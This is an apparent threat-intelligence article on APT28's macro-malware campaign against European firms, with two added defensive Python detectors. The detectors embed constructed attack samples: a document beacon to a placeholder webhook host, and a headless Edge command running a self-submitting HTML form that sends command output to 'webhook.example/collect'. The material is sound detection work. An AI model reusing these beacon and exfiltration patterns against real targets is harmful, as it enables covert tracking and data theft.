APT28 Targets European Businesses Using Webhook-based Macro Malware

A Russian-linked state-sponsored threat actor tracked as APT28 has been attributed to a new campaign targeting organizations in Western and Central Europe.
The operation, codenamed Operation MacroMaze, was active between September 2025 and January 2026, according to S2 Grupo's LAB52 threat intelligence team. "The campaign relies on the use of basic tools and the exploitation of legitimate infrastructure services and data processing," the cybersecurity company said.
Attack chains that use phishing emails as a starting point to distribute decoy documents share a common structural element within their XML: an "INCLUDEPICTURE" field that points to a webhook[.]site URL hosting a JPG image. This, in turn, causes the image file to be downloaded from the remote server when the document is opened.
Put differently, these documents act as beacons: like a tracking pixel, opening the document triggers an outgoing HTTP request to the webhook[.]site URL. The operator of that endpoint can then inspect the metadata associated with the request, confirming that the document has actually been opened by the recipient.
LAB52 said it identified several documents with slightly modified macros between the end of September 2025 and January 2026, all of which function as a dropper that profiles the host and delivers additional payloads.
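The beacon described above lives in the document's field codes, so it can be found statically without opening the file in Word. The following is an added example (not LAB52's tooling and not code from the original article) that unpacks a .docx, walks the WordprocessingML parts for INCLUDEPICTURE fields in both the simple (`w:fldSimple`) and complex (`w:fldChar`/`w:instrText`) forms, and reports any field whose target is a remote URL. The sample documents are constructed in memory, and the `webhook.example` host is a placeholder standing in for the webhook service named in the report.

```python
import io
import re
import zipfile
from xml.etree import ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# Field code of the form: INCLUDEPICTURE "target" [switches]
INCLUDEPICTURE_RE = re.compile(r'INCLUDEPICTURE\s+"([^"]+)"', re.IGNORECASE)
# Anything fetched over the network when the document is rendered is a beacon.
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def _field_codes(part_xml: bytes):
    """Yield every field instruction string found in one WordprocessingML part.

    Simple fields carry the code in the w:instr attribute; complex fields spread
    it over w:instrText runs between a fldChar 'begin' and the matching 'end'.
    """
    root = ET.fromstring(part_xml)
    for el in root.iter(f"{{{W_NS}}}fldSimple"):
        yield el.get(f"{{{W_NS}}}instr", "")
    buf = None
    for el in root.iter():  # document order, so begin/instrText/end are sequential
        if el.tag == f"{{{W_NS}}}fldChar":
            kind = el.get(f"{{{W_NS}}}fldCharType")
            if kind == "begin":
                buf = []
            elif kind == "end" and buf is not None:
                yield "".join(buf)
                buf = None
        elif el.tag == f"{{{W_NS}}}instrText" and buf is not None:
            buf.append(el.text or "")


def find_remote_includepicture(docx_bytes: bytes):
    """Return (part name, URL) for each INCLUDEPICTURE field with a remote target."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            # headers, footers and footnotes can carry fields too, so scan all XML parts
            if name.startswith("word/") and name.endswith(".xml"):
                for code in _field_codes(z.read(name)):
                    for target in INCLUDEPICTURE_RE.findall(code):
                        if REMOTE_RE.match(target):
                            hits.append((name, target))
    return hits


def build_sample_docx(paragraph_xml: str) -> bytes:
    """Constructed minimal .docx (not a real sample) wrapping one paragraph."""
    document = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<w:document xmlns:w="{W_NS}"><w:body><w:p>{paragraph_xml}</w:p></w:body></w:document>'
    )
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Override PartName="/word/document.xml" ContentType="application/vnd.'
        'openxmlformats-officedocument.wordprocessingml.document.main+xml"/></Types>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("word/document.xml", document)
    return buf.getvalue()


# Constructed field bodies; webhook.example is a placeholder host, not the real service.
BEACON_URL = "https://webhook.example/abc123/beacon.jpg"
BEACON_SIMPLE = (
    f'<w:fldSimple w:instr=" INCLUDEPICTURE &quot;{BEACON_URL}&quot; \\d ">'
    '<w:r><w:t> </w:t></w:r></w:fldSimple>'
)
BEACON_COMPLEX = (
    '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    f'<w:r><w:instrText xml:space="preserve"> INCLUDEPICTURE "{BEACON_URL}" \\* MERGEFORMATINET </w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
    '<w:r><w:t>image</w:t></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
)
LOCAL_PICTURE = (
    '<w:fldSimple w:instr=" INCLUDEPICTURE &quot;C:\\\\images\\\\logo.jpg&quot; ">'
    '<w:r><w:t> </w:t></w:r></w:fldSimple>'
)

if __name__ == "__main__":
    for label, body in (("simple", BEACON_SIMPLE), ("complex", BEACON_COMPLEX), ("local", LOCAL_PICTURE)):
        print(label, find_remote_includepicture(build_sample_docx(body)))
```

A local picture path is left alone because the point is the outbound request, not the field type itself; in triage, a remote target in any INCLUDEPICTURE field is worth a look regardless of the host, since the beacon works the same way from any server the operator controls.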
“Although the concept of all detected macros remains the same, the documents show a change in evasion techniques, from using a ‘headless’ browser in the old version to the use of keyboard emulation (SendKeys) in the new versions to bypass the security commands,” explains the Spanish cybersecurity company.
The macro is designed to execute a Visual Basic Script (VBScript) that moves the infection to the next stage. That script, in turn, runs a CMD file to establish persistence via scheduled tasks and launches a batch script that loads a small Base64-encoded HTML payload in Microsoft Edge in headless mode to evade detection. The payload retrieves a command from the webhook[.]site endpoint, runs it, captures the output, and exfiltrates it to another webhook[.]site endpoint in the form of an HTML file.
A second variant of the batch script drops the headless launch in favor of moving the browser window off-screen, then aggressively terminates all other Edge browser processes to ensure a controlled environment.
"When the resulting HTML file is rendered by Microsoft Edge, the form is submitted, causing the collected command output to be sent to a remote webhook endpoint without user interaction," LAB52 said. "This browser-based exfiltration method uses standard HTML functionality to transfer data while minimizing disk-based artifacts."
"This campaign proves that simplicity can be powerful. The attacker uses very basic tools (batch files, small VBS launchers and simple HTML) but carefully orchestrates them to increase stealth: moving operations to hidden or off-screen browser sessions, cleaning artifacts, and outsourcing both payload delivery and data exfiltration to widely used webhook services."
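The exfiltration step leaves little on disk, but it does leave a process-creation record: a browser launched with an inline HTML document whose form submits itself to an external endpoint, and, in the second variant, a window pushed off-screen plus a kill of competing Edge processes. The following is an added example (not LAB52's detection logic and not code from the original article) that triages constructed command lines for those traits. The specific flags it looks for (`--headless`, `--window-position` with negative coordinates, `taskkill /IM msedge.exe`) are assumptions about how such a launch would look; the report names the behaviours, not the exact switches. The sample events and the `webhook.example` host are constructed.

```python
import base64
import re
from html.parser import HTMLParser

# Inline HTML handed to the browser as a data: URI, Base64-encoded.
DATA_HTML_RE = re.compile(r"data:text/html;base64,([A-Za-z0-9+/=]+)", re.IGNORECASE)
HEADLESS_RE = re.compile(r"(?:^|\s)--headless\b", re.IGNORECASE)  # assumed flag
WINDOW_POS_RE = re.compile(r"--window-position=(-?\d+),(-?\d+)", re.IGNORECASE)  # assumed flag


class _FormFinder(HTMLParser):
    """Collects form targets and whether the page submits a form without user action."""

    def __init__(self):
        super().__init__()
        self.forms = []          # (method, action)
        self.auto_submit = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append((a.get("method", "get").lower(), a.get("action", "")))
        elif tag == "body" and "submit" in a.get("onload", "").lower():
            self.auto_submit = True

    def handle_data(self, data):
        # inline <script> bodies arrive here; a .submit( call is the usual trigger
        if ".submit(" in data:
            self.auto_submit = True


def _image_name(cmdline: str) -> str:
    """First token of the command line, quoted or not, lower-cased."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', cmdline)
    return ((m.group(1) or m.group(2)) if m else "").lower()


def triage(cmdline: str):
    """Return a list of reasons a process-creation command line looks like the
    browser-based exfiltration chain; an empty list means nothing matched."""
    reasons = []
    image = _image_name(cmdline)

    if image.endswith("taskkill.exe") or image.endswith("taskkill"):
        if "msedge.exe" in cmdline.lower():
            reasons.append("terminates other Edge processes")
        return reasons

    if not image.endswith("msedge.exe"):
        return reasons

    if HEADLESS_RE.search(cmdline):
        reasons.append("headless browser launch")
    pos = WINDOW_POS_RE.search(cmdline)
    if pos and (int(pos.group(1)) < 0 or int(pos.group(2)) < 0):
        reasons.append("browser window positioned off-screen")

    m = DATA_HTML_RE.search(cmdline)
    if m:
        html = base64.b64decode(m.group(1)).decode("utf-8", "replace")
        finder = _FormFinder()
        finder.feed(html)
        for method, action in finder.forms:
            if action.lower().startswith(("http://", "https://")):
                how = "auto-submits" if finder.auto_submit else "submits"
                reasons.append(f"inline HTML {how} a {method.upper()} form to {action}")
    return reasons


# Constructed sample: a page that posts captured output as soon as it loads.
SAMPLE_HTML = (
    '<html><body onload="document.forms[0].submit()">'
    '<form method="POST" action="https://webhook.example/collect">'
    '<textarea name="out">constructed command output</textarea></form></body></html>'
)
SAMPLE_DATA_URI = "data:text/html;base64," + base64.b64encode(SAMPLE_HTML.encode()).decode()

SAMPLE_EVENTS = [  # constructed process-creation command lines
    f'"C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe" --headless --disable-gpu "{SAMPLE_DATA_URI}"',
    f'msedge.exe --window-position=-32000,-32000 "{SAMPLE_DATA_URI}"',
    'taskkill /F /IM msedge.exe',
    'msedge.exe https://www.example.com/',
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(triage(ev) or "clean", "<-", ev[:60])
```

Decoding the data: URI is the useful part: the flag alone is benign in plenty of automation, but a headless or off-screen browser handed a self-submitting form that posts to an external host is the combination the report describes, and keying on the decoded form target rather than a fixed domain keeps the check working when the webhook service changes.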